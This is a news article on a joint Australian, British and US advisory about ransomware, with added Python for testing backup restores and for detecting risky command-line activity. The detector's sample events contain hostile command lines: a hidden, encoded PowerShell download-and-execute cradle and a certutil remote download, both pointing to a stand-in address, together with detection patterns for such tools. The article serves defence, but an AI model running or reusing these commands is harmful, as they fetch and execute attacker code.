Cyber Agencies Warn: Ransomware Attacks Are Worse Than Ever
Follow Our Recommended Steps Now, Joint Advisory From Australia, UK and US Urges
Memo to businesses: Ransomware attacks are worse than ever, and unless you prepare, don't be surprised if you or your business is the next victim, warn government cybersecurity czars.
"In 2021, cybersecurity authorities in the United States, Australia, and the United Kingdom observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally," says a joint advisory issued by all three countries' lead cybersecurity agencies.
More efforts are now underway to track, combat and mitigate groups that use ransomware. Even so, the latest view from the front lines is that extortionists wielding crypto-locking malware continue to take down numerous targets, largely with impunity. So organizations need to prepare now or get set to pay later.
To improve the cyber resiliency of domestic businesses, all three countries' governments have been focused on trying to ensure that senior executives and boards of directors review their organization's IT and cybersecurity postures. Government cybersecurity czars are urging them to ensure that at least the basics are being done correctly and to build from there.
"We live at a time when every government, every business, every person must focus on the threat of ransomware and take action to mitigate the risk of becoming a victim," says Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Security Agency, aka CISA.
Critical Infrastructure Falling Victim
The joint alert notes that ransomware attacks have affected at least 14 of the 16 U.S. critical infrastructure sectors, which include communications, emergency services, water, energy and financial services. One of the hardest-hit sectors, despite any supposed promises from criminals to spare it during the ongoing pandemic, continues to be healthcare.
Britain's National Cyber Security Center, or NCSC, which is part of the security, intelligence and cyber agency GCHQ, says ransomware is now the top threat facing British organizations, and the education sector has been particularly hard hit.
The Australian Cyber Security Center, or ACSC, says the country's healthcare, financial services, higher education and research, and energy sectors have been hit especially hard.
Increasingly, ransomware is seen as a national security risk. Last May, Conti-wielding attackers hit Ireland's national health service, while DarkSide-wielding attackers disrupted Colonial Pipeline, a major, privately owned pipeline operator that carries about 45% of the fuel consumed on the U.S. East Coast. Experts say it's not clear that the attackers set out to disrupt critical infrastructure; rather, these organizations appear simply to have fallen victim. Nevertheless, the attacks led, respectively, to a disruption in patient care and to the panic-buying of fuel.
Such attacks helped drive the U.S. and allies to retool their approach and devote more law enforcement and intelligence resources to track and disrupt ransomware operations, as well as attempt to identify and arrest perpetrators. In addition, greater resources - such as the joint alert and the guidance underpinning it - are being commissioned to help improve the cyber resiliency of domestic organizations. Diplomatic pressure is also being increased on countries seen as a safe haven for cybercriminals, such as Russia.
"When critical infrastructure is held at risk by foreign hackers operating from a safe haven in an adversary country, that's a national security problem," says Rob Joyce, cybersecurity director of the U.S. National Security Agency. "The ransomware scourge is a significant focus area for NSA as we generate insights alongside our partners. Network defenders should take action on the mitigations in the advisory."
Latest Look at Essential Defenses
Recommendations in the advisory address ensuring that basic-level defenses are in place. They include:
- Stay current: Keep all operating systems and software fully patched and up to date.
- Lock down remote access: Poorly secured remote desktop protocol, or RDP, connections continue to be one of the most successful vectors for gaining initial access to corporate networks.
- Train users: Together with RDP and exploiting unpatched flaws, phishing attacks remain a top attack tactic. Accordingly, an effective response must include education to "reinforce the appropriate user response to phishing and spear-phishing emails," the advisory says.
- Fewer administrators: Require the use of strong passwords for all accounts, minimize admin-level access to systems and use time-based access controls for granting temporary, privileged access, when required.
- Lock down Linux: "If using Linux, use a Linux security module - such as SELinux, AppArmor or SecComp - for defense in depth," the advisory says. (Strictly, seccomp is a system-call filter rather than a Linux Security Module, but it serves the same goal of limiting what a compromised process can do.)
- Better authentication: Use multifactor authentication wherever feasible, but especially for critical systems, in case attackers steal the passwords they need to access them.
- Protect the cloud: "Backing up to multiple locations, requiring MFA for access, and encrypting data in the cloud" will help. Likewise, "if using cloud-based key management for encryption, ensure that storage and key administration roles are separated," the advisory says.
Whatever an organization does to improve its defenses, attackers will alter their approach to try to negate it, as the joint advisory details via the advice it offers for countering current attack strategies.
For example, it urges organizations to ensure that all backups are encrypted, that multiple copies are stored offline - meaning "physically disconnected" - and that backup and restoration procedures are regularly tested. "To further secure cloud backups, consider separation of account roles to prevent an account that manages the backups from being used to deny or degrade the backups should the account become compromised," it says.
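The "regularly tested and restored" part of that advice is the one most often skipped. The following script is an added example, not code from the advisory or from any of the agencies, of what a minimal restore drill looks like: it archives a constructed sample tree, records a SHA-256 manifest at backup time, restores the archive into a scratch directory and verifies every restored file against the manifest, reporting corrupted, missing or unexpected files. Encryption of the archive at rest and the offline copy are assumed to be handled by the backup tooling; the sample files, paths and the `tamper` switch (which simulates a truncated restore) are constructed for illustration.

```python
"""Backup restore drill: archive, manifest, restore, verify (added example)."""
import hashlib
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large backups do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def create_backup(src: Path, archive: Path) -> dict[str, str]:
    """Archive src and return the manifest recorded at backup time.

    The manifest should be stored with the offline copy, separately from the
    account that writes backups, so a compromised writer cannot silently
    rewrite both the archive and the record used to check it.
    """
    manifest = build_manifest(src)
    with tarfile.open(archive, "w:gz") as tar:
        for child in sorted(src.iterdir()):
            tar.add(child, arcname=child.name)
    return manifest


def restore(archive: Path, dest: Path) -> None:
    """Extract the archive, refusing absolute or '..' member paths where supported."""
    with tarfile.open(archive, "r:gz") as tar:
        try:
            tar.extractall(dest, filter="data")  # Python 3.12+ and security backports
        except TypeError:  # older interpreter without the filter= argument
            tar.extractall(dest)


def verify_restore(dest: Path, manifest: dict[str, str]) -> list[str]:
    """Return a list of problems; an empty list means the restore is good."""
    problems = []
    restored = build_manifest(dest)
    for rel, digest in manifest.items():
        if rel not in restored:
            problems.append(f"missing: {rel}")
        elif restored[rel] != digest:
            problems.append(f"hash mismatch: {rel}")
    for rel in restored:
        if rel not in manifest:
            problems.append(f"unexpected file: {rel}")
    return problems


def run_restore_test(tamper: bool = False) -> list[str]:
    """End-to-end drill on a constructed sample tree.

    tamper=True overwrites one restored file with nothing, simulating a
    truncated or corrupted restore, so the check is seen to fail.
    """
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        src = base / "src"  # constructed sample data, not real backups
        (src / "db").mkdir(parents=True)
        (src / "db" / "accounts.sql").write_bytes(b"CREATE TABLE accounts (id INT);\n" * 50)
        (src / "config.yaml").write_text("retention_days: 30\n")

        archive = base / "nightly.tar.gz"
        manifest = create_backup(src, archive)

        dest = base / "restore"
        dest.mkdir()
        restore(archive, dest)
        if tamper:
            (dest / "db" / "accounts.sql").write_bytes(b"")
        return verify_restore(dest, manifest)


if __name__ == "__main__":
    print("clean restore problems:", run_restore_test())
    print("tampered restore problems:", run_restore_test(tamper=True))
```

Run it on a schedule against a real archive and treat any non-empty problem list as an incident in its own right: a backup that cannot be restored is the failure mode ransomware crews count on.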
Other advice focuses on segmenting networks, using end-to-end encryption, ensuring the security team is tracking "telemetry from cloud environments," investigating all abnormal activity, fully documenting all externally facing remote connections and disabling and monitoring for unneeded command-line utilities and scripting, among many other recommendations (see: Block This Now: Cobalt Strike and Other Red-Team Tools).
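Of those recommendations, "disabling and monitoring for unneeded command-line utilities and scripting" is the one that translates most directly into detection logic. The script below is an added example, not code from the advisory or the agencies, that runs three checks over process-creation events: use of utilities most workstations have no business running, PowerShell launched with hidden-window or execution-policy-bypass flags or an encoded command (which it decodes from base64 UTF-16LE so an analyst sees the payload), and download-style arguments on those utilities. The event shape is a simplified Sysmon-style record, the utility and Office-application lists are an illustrative subset, and the four sample events (including the 192.0.2.x TEST-NET addresses) are constructed for the example.

```python
"""Flag risky command-line and scripting activity in process-creation events (added example)."""
import base64
import ntpath
import re

# Illustrative subset of utilities that advisory-style hardening would disable
# or at least monitor on hosts that have no need for them.
WATCHED_UTILITIES = {
    "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "certutil.exe", "bitsadmin.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe",
}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# PowerShell flags that rarely appear in legitimate administration.
SUSPICIOUS_PS_FLAGS = re.compile(
    r"-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|exec(?:utionpolicy)?\s+bypass)\b",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-style arguments on living-off-the-land binaries.
REMOTE_FETCH = re.compile(r"-urlcache|/transfer|https?://", re.IGNORECASE)

# Constructed sample events (simplified Sysmon event ID 1 shape); not real telemetry.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"host": "WS-0417", "user": "CORP\\jsmith",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "WS-0417", "user": "CORP\\jsmith", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"host": "WS-0502", "user": "CORP\\mlee", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://192.0.2.10/x.bin x.bin"},
    {"host": "SRV-BKP01", "user": "NT AUTHORITY\\SYSTEM", "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\rotate-backups.ps1"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, '<undecodable>' on bad data, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def analyze_event(ev: dict):
    """Return a finding dict for a suspicious event, or None for benign ones."""
    image = ntpath.basename(ev["image"]).lower()   # ntpath handles Windows paths on any OS
    parent = ntpath.basename(ev["parent"]).lower()
    cmd = ev["cmdline"]
    reasons = []
    if image in WATCHED_UTILITIES:
        reasons.append(f"watched utility {image}")
        if parent in OFFICE_APPS:
            reasons.append(f"spawned by office application {parent}")
        if REMOTE_FETCH.search(cmd):
            reasons.append("remote content fetch")
    decoded = None
    if image in POWERSHELL:
        if SUSPICIOUS_PS_FLAGS.search(cmd):
            reasons.append("powershell hidden/bypass flags")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
    if not reasons:
        return None
    severity = "high" if len(reasons) > 1 or decoded is not None else "medium"
    return {"host": ev["host"], "user": ev["user"], "image": image,
            "severity": severity, "reasons": reasons, "decoded": decoded}


def analyze(events: list) -> list:
    """Run every event through analyze_event and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["host"], finding["image"], finding["reasons"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

The medium-severity hit on the backup server's scheduled PowerShell job is deliberate: it is exactly the kind of legitimate use that should be captured in an allowlist keyed on host, user and script path, so that the same utility appearing on an ordinary workstation, or with an encoded command anywhere, still raises an alert.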
Prevention and Response: Dedicated Resources
Each of the countries behind the joint advisory offers a number of ransomware resources, including:
- Australia: ACSC's how to guard against ransomware and what to do if you are held to ransom;
- U.K.: NCSC's Ransomware Hub and a guide to reporting if you fall victim;
- U.S.: CISA's stopransomware.gov and Ransomware Readiness Assessment.
Those sites include resources for anyone who does fall victim. The advisory also urges victims to report all attacks, to help cybersecurity agencies better track the groups at work and the tactics they're using.
"Ransomware is a rising global threat with potentially devastating consequences but there are steps organizations can take to protect themselves," says Lindy Cameron, CEO of Britain's NCSC. "I strongly encourage U.K. CEOs and boards to familiarize themselves with this alert and to ensure their IT teams are taking the correct actions to bolster resilience."
Plea: Don't Pay Ransoms
The three countries' cybersecurity agencies also "strongly discourage paying a ransom to criminal actors," as they emphasize in the advisory. "Criminal activity is motivated by financial gain, so paying a ransom may embolden adversaries to target additional organizations - or re-target the same organization - or encourage cybercriminals to engage in the distribution of ransomware," they say.
"Paying the ransom also does not guarantee that a victim's files will be recovered," they add. "Additionally, reducing the financial gain of ransomware threat actors will help disrupt the ransomware criminal business model."